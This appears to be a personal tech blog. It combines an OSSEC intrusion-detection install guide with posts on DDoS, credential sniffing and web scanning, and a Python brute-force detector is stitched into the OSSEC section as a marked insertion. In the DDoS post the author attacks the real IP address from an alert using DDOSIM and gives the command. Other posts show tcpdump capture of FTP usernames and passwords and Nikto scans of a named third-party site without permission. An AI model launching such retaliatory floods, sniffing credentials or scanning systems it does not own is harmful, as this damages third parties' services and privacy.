IDS with OSSEC HIDS

Implementing an IDS (intrusion detection system) on Linux using OSSEC HIDS.
OSSEC HIDS is an application package used to monitor a system for activities that are considered threatening (attacks); it then logs them and can send a warning by e-mail to the system administrator.

OSSEC is a multi-platform application, so implement it according to the operating system you use. Below is how to install and configure it on Linux, specifically Ubuntu Server 11.04.

1. Make sure the basic build packages on Ubuntu are complete; to install them:

$ sudo apt-get install build-essential

2. Download the latest version of OSSEC, currently 2.6

$ sudo wget http://www.ossec.net/files/ossec-hids-2.6.tar.gz

3. Extract

$ sudo tar -xzvf ossec-hids-2.6.tar.gz

4. Enter the extracted directory, run install.sh and follow the instructions it gives.

cd ossec-hids-2.6

./install.sh

here is roughly what will appear ^_^;

----------

** Para instalação em português, escolha [br].
** Fur eine deutsche Installation wohlen Sie [de].
** For installation in English, choose [en].
** Per l'installazione in Italiano, scegli [it].
** Aby instalowac w jezyku Polskim, wybierz [pl].
** Türkçe kurulum için seçin [tr].
(en/br/de/it/pl/tr) [en]: en
OSSEC HIDS v0.8 Installation Script - http://www.ossec.net

You are about to start the installation process of the OSSEC HIDS.
You must have a C compiler pre-installed in your system.
If you have any questions or comments, please send an e-mail
to dcid@ossec.net (or daniel.cid@gmail.com).

- System: Linux diana 2.6.15-25-k7
- User: root - Host: xpredator


-- Press ENTER to continue or Ctrl-C to abort. --


1- What kind of installation do you want (server, agent, local or help)? local
- Choose where to install the OSSEC HIDS [/var/ossec]:
3- Configuring the OSSEC HIDS.

3.1- Do you want e-mail notification? (y/n) [y]: y
- What's your e-mail address? emailkita@email.com
- What's your SMTP server ip/host? your smtp server address (localhost)

3.2- Do you want to run the integrity check daemon? (y/n) [y]: y

- Running syscheck (integrity check daemon).

3.3- Do you want to run the rootkit detection engine? (y/n) [y]: y

- Running rootcheck (rootkit detection).

3.4- Active response allows you to execute a specific
command based on the events received. For example,
you can block an IP address or disable access for
a specific user.
More information at:

http://www.ossec.net/en/manual.html#active-response

- Do you want to enable active response? (y/n) [y]: y

- Active response enabled.

- By default, we can enable the host-deny and the
firewall-drop responses. The first one will add
a host to the /etc/hosts.deny and the second one
will block the host on iptables (if linux) or on
ipfilter (if Solaris, FreeBSD or NetBSD).
- They can be used to stop SSHD brute force scans,
portscans and some other forms of attacks. You can
also add them to block on snort events, for example.

- Do you want to enable the firewall-drop response? (y/n) [y]: y

- firewall-drop enabled (local) for levels >= 6

- Default white list for the active response:

- 192.168.2.1

- Do you want to add more IPs to the white list? (y/n)? [n]: n

3.6- Setting the configuration to analyze the following logs:

-- /var/log/messages
-- /var/log/auth.log
-- /var/log/syslog
-- /var/log/mail.info
-- /var/log/apache2/error.log (apache log)
-- /var/log/apache2/access.log (apache log)

- If you want to monitor any other file, just change
the ossec.conf and add a new localfile entry.
Any questions about the configuration can be answered
by visiting us online at http://www.ossec.net .

--- Press ENTER to continue ---
- Unknown system. No init script added.
- Configuration finished properly.

- To start OSSEC HIDS:

/var/ossec/bin/ossec-control start

- To stop OSSEC HIDS:

/var/ossec/bin/ossec-control stop

- The configuration can be viewed or modified at /var/ossec/etc/ossec.conf

Thanks for using the OSSEC HIDS.
If you have any question, suggestion or if you find any bug,
contact us at contact@ossec.net or using our public maillist at
ossec-list@ossec.net
(http://mailman.underlinux.com.br/mailman/listinfo/ossec-list).

More information can be found at http://www.ossec.net

--- Press ENTER to finish (maybe more information bellow). ---

/etc/init.d/ossec start

an example of a (real) alert sent to my e-mail:

----

OSSEC HIDS Notification.

2011 Aug 01 06:49:06

Received From: xpredator->/var/log/auth.log
Rule: 5551 fired (level 10) -> "Multiple failed logins in a small period of time."
Portion of the log(s):

Aug 1 06:49:04 xpredator sshd[31563]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.228.197.134 user=root
Aug 1 06:48:55 xpredator sshd[31491]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.228.197.134 user=root
Aug 1 06:48:45 xpredator sshd[31435]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.228.197.134 user=root
Aug 1 06:48:35 xpredator sshd[31426]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.228.197.134 user=root
Aug 1 06:48:26 xpredator sshd[31358]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.228.197.134 user=root
Aug 1 06:48:16 xpredator sshd[31302]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.228.197.134 user=root
Aug 1 06:48:07 xpredator sshd[31295]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.228.197.134 user=root
Aug 1 06:47:58 xpredator sshd[31249]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.228.197.134 user=root


--END OF NOTIFICATION



OSSEC HIDS Notification.
2011 Aug 01 06:49:08

Received From: xpredator->/var/log/auth.log
Rule: 5720 fired (level 10) -> "Multiple SSHD authentication failures."
Portion of the log(s):

Aug 1 06:49:06 xpredator sshd[31563]: Failed password for root from 122.228.197.134 port 59870 ssh2
Aug 1 06:48:57 xpredator sshd[31491]: Failed password for root from 122.228.197.134 port 59156 ssh2
Aug 1 06:48:47 xpredator sshd[31435]: Failed password for root from 122.228.197.134 port 58373 ssh2
Aug 1 06:48:37 xpredator sshd[31426]: Failed password for root from 122.228.197.134 port 57604 ssh2
Aug 1 06:48:28 xpredator sshd[31358]: Failed password for root from 122.228.197.134 port 56851 ssh2
Aug 1 06:48:18 xpredator sshd[31302]: Failed password for root from 122.228.197.134 port 56104 ssh2
Aug 1 06:48:09 xpredator sshd[31295]: Failed password for root from 122.228.197.134 port 55355 ssh2
Aug 1 06:47:59 xpredator sshd[31249]: Failed password for root from 122.228.197.134 port 54609 ssh2

--END OF NOTIFICATION
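As an added example (not from this post or from OSSEC itself), the following Python reproduces, over constructed auth.log lines modelled on the alert above, the kind of frequency correlation that rule 5720 reports: it parses sshd "Failed password" lines and flags any source host with at least N failures inside a sliding window of W seconds. The threshold, window, year, hostname and the RFC 5737 addresses are assumptions.

```python
import re
from datetime import datetime

# Matches the sshd "Failed password" lines quoted in the alert above.
FAILED_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<host>\S+) port \d+"
)

def parse_failures(lines, year=2011):
    """Return (timestamp, user, source host) for each sshd failed-password line.
    Syslog lines carry no year, so one is supplied by the caller (assumed 2011)."""
    out = []
    for line in lines:
        m = FAILED_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} " + " ".join(m["ts"].split()), "%Y %b %d %H:%M:%S")
            out.append((ts, m["user"], m["host"]))
    return out

def brute_force_sources(lines, threshold=8, window_s=120):
    """Source host -> total failures for hosts with at least `threshold` failures
    inside some `window_s`-second sliding window (frequency correlation as in the
    alert above; threshold and window are assumptions, not OSSEC's parameters)."""
    by_host = {}
    for ts, _user, host in parse_failures(lines):
        by_host.setdefault(host, []).append(ts)
    hits = {}
    for host, stamps in by_host.items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):
            while (ts - stamps[start]).total_seconds() > window_s:
                start += 1          # drop events that fell out of the window
            if end - start + 1 >= threshold:
                hits[host] = len(stamps)
                break
    return hits

def sample_lines():
    """Constructed auth.log lines modelled on the alert above (RFC 5737 addresses)."""
    times = ["06:47:59", "06:48:09", "06:48:18", "06:48:28",
             "06:48:37", "06:48:47", "06:48:57", "06:49:06"]
    lines = [f"Aug  1 {t} server1 sshd[{31000 + i}]: Failed password for root "
             f"from 203.0.113.7 port {54609 + 700 * i} ssh2" for i, t in enumerate(times)]
    lines.append("Aug  1 06:48:30 server1 sshd[31400]: Failed password for bob "
                 "from 198.51.100.9 port 40001 ssh2")
    lines.append("Aug  1 06:48:31 server1 sshd[31400]: Accepted password for bob "
                 "from 198.51.100.9 port 40001 ssh2")
    return lines
```

With the defaults, `brute_force_sources(sample_lines())` returns only the host that produced eight failures within the window; a single failure from another host is parsed but not flagged.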

=============

DDoS in BT 5

The IDS (intrusion detection system) gave an alert that an attack attempt had taken place against one of my servers, and I found that the IP came from China.

Next I responded by finding out about and scanning that host IP as a counter-response; not satisfied, I tried a DDoS attack with DDOSIM on one of the open ports that I thought was potentially attackable. ^_^

here are the steps

1. download ddosim from http://sourceforge.net/projects/ddosim/files/ddosim-0.2.tar.gz

2. extract: # tar -zxvf ddosim-0.2.tar.gz

3. run the following commands:

# cd ddosim

# ./configure

# make

# make install

4. ddosim is ready to use; here are the usage instructions:

-------------------

# DDOSIM: Layer 7 DDoS Simulator v0.2
# Author: Adrian Furtuna


Usage: ./ddosim
-d IP Target IP address
-p PORT Target port
[-k NET] Source IP from class C network (ex. 10.4.4.0)
[-i IFNAME] Output interface name
[-c COUNT] Number of connections to establish
[-w DELAY] Delay (in milliseconds) between SYN packets
[-r TYPE] Request to send after TCP 3-way handshake. TYPE can be HTTP_VALID or HTTP_INVALID or SMTP_EHLO
[-t NRTHREADS] Number of threads to use when sending packets ( default 1)
[-n] Do not spoof source address (use local address)
[-v] Verbose mode (slower)
[-h] Print this help message

-------------------------------------------
example usage:
# ddosim -d 122.228.197.134 -p 80 -r HTTP_INVALID -w 2 -c 5 -t 5

happy trying ^_^



note:
* make sure the libnet0-dev library is installed on your system,
* the sin is yours alone if you use this on someone :p


Ubuntu as a Router

To turn Ubuntu into a router, with the following scheme:

Modem -- Router -- Lan

modem: 192.168.2.1

Router: eth0 -> 192.168.1.1 (towards the LAN)
eth1 -> IP obtained from the modem's dial-up (just leave it automatic)
LAN: 192.168.1.0/24
note: make sure your router has at least 2 (two) NICs; with only one it is not going to become a router ^_^



1. to dial the modem from the router, please read the dial-up modem post



2. for network card configuration in Ubuntu, read the static IP configuration in Ubuntu post

3. Now the extra step is here: edit the file /etc/sysctl.conf

and remove the "#" from the line

#net.ipv4.ip_forward=1

so that it becomes (use your favourite editor)

net.ipv4.ip_forward=1

4. insert the masquerade rule into the file /etc/rc.local before exit 0; example rule:

for those who dial the modem from Ubuntu, insert:

iptables -t nat -A POSTROUTING -o ppp0 -j MASQUERADE

for those who dial from the modem:

iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -o eth1 -j MASQUERADE

replace "192.168.1.0/24" with the IP range of the internal LAN, and replace -o eth1 with the NIC facing the modem (external); again, use your favourite editor to do this.

5. restart all networking services

$ sudo /etc/init.d/networking restart



$ sudo sysctl -p

rebooting is fine too; set the clients to an IP range between 192.168.1.2 - 192.168.1.254 with gateway 192.168.1.1.

okay, that's all for now; to be continued with setting up a proxy with squid.

good luck ^_^

Tcpdump targeting port 21 (FTP)

Run the tcpdump command on your PC to capture the username and password sent to the FTP server; here is the command:

# tcpdump -q -i eth0 -n -A port 21 > target.txt

after a while press Ctrl + C to stop the sniffing, and the number of packets successfully captured will be shown.

to filter so that only the username and password are displayed, run the command:

# cat target.txt | grep USER ; cat target.txt | grep PASSWORD

if you are lucky, the username and password will be displayed.

okay, good luck ;)



Nikto part I

One well-known program for scanning servers is nikto (cirt.net). Below the author tries to give an example of using it to scan a web server. By the way, apologies to the owner of the server: I was only playing around and did not damage your system, and if there are other intruders in your system I am not involved in that at all ^_^.

1. the most basic nikto scan example

root@bt:/pentest/web/nikto# perl nikto.pl -h jehz.com.my
- Nikto v2.1.4
---------------------------------------------------------------------------
+ Target IP: 204.45.108.42
+ Target Hostname: jehz.com.my
+ Target Port: 80
+ Start Time: 2011-08-02 21:19:39
---------------------------------------------------------------------------
+ Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
+ Root page / redirects to: http://jehz.com.my/cgi-sys/suspendedpage.cgi
+ mod_ssl/2.2.19 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ Number of sections in the version string differ from those in the database, the server reports: openssl/0.9.8e-fips-rhel5 while the database has: 1.0.0.100. This may cause false positives.
+ OpenSSL/0.9.8e-fips-rhel5 appears to be outdated (current is at least 1.0.0d). OpenSSL 0.9.8r is also current.
+ FrontPage/5.0.2.2635 appears to be outdated (current is at least 5.0.4.3) (may depend on server version)
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ FrontPage - http://www.insecure.org/sploits/Microsoft.frontpage.insecurities.html
+ mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.
+ /cgi-sys/formmail.pl: Many versions of FormMail have remote vulnerabilities, including file access, information disclosure and email abuse. FormMail access should be restricted as much as possible or a more secure solution found.
+ /cgi-sys/guestbook.cgi: May allow attackers to execute commands as the web daemon.
+ OSVDB-27071: /phpimageview.php?pic=javascript:alert(8754): PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
--- cut ---

from the output above it can be seen that the target has several bugs, and there are more further down.

2. To scan a target on a specific port

root@bt:/pentest/web/nikto# perl nikto.pl -h 204.45.108.42 -p 443

- Nikto v2.1.4
---------------------------------------------------------------------------
+ Target IP: 204.45.108.42
+ Target Hostname: bliss.theservergroup.info
+ Target Port: 443
+ Start Time: 2011-08-02 22:33:56
---------------------------------------------------------------------------
+ Server: Apache/2.2.19 (Unix) mod_ssl/2.2.19 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635

3. Scan against several specific ports:

root@bt:/pentest/web/nikto# perl nikto.pl -h 204.45.108.42 -p 80,88,443,22,21

- Nikto v2.1.4
---------------------------------------------------------------------------
+ No web server found on bliss.theservergroup.info:88
---------------------------------------------------------------------------

heheh, that's all for now; combining it with other tools can wait.... besides, other people are doing tadarus while I'm busy looking at things that aren't mine... that would only spoil my fast ^_^.

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | cheap international voip calls